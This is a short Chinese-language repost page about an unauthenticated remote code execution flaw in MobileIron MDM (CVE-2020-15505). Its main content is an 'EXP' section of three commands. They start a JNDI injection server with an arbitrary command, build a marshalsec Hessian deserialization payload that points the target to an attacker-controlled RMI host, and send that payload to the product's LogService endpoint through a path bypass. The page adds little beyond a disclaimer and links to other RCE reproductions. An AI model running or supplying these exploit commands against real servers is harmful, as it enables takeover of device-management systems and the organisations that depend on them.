MobileIronMDM 未授权RCE

本文转载自查看原文 2020-09-15 16:38 755 Web安全/ 技巧

请遵守网络安全法！！！本文仅供学习交流使用！用于任何非授权渗透、非法目的攻击、从事非法活动均与笔者无关！读者自行承担其恶果！

EXP

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "<Command>"
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://<server-ip>:1099/<codebase> > exp
python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService'

来源

https://github.com/iamnoooob/CVE-Reverse/tree/master/CVE-2020-15505

免责声明！

本站转载的文章为个人学习借鉴使用，本站对版权不负任何法律责任。如果侵犯了您的隐私权益，请联系本站邮箱yoyou2525@163.com删除。

猜您在找 spark未授权RCE漏洞 spark未授权RCE漏洞学习【漏洞复现】Vmware vcenter未授权任意文件RCE 通达OA未授权文件上传+文件包含RCE 复现 redis未授权漏洞和主从复制rce漏洞利用【漏洞复现】CVE-2021-22205 GitLab 未授权RCE Spring未授权REC利用方式一（env接口/snakeyaml RCE） docker-API未授权访问导致RCE Spring未授权REC利用方式二（env接口/eureka xstream RCE） Spring未授权REC利用方式四（env接口/h2 database query RCE)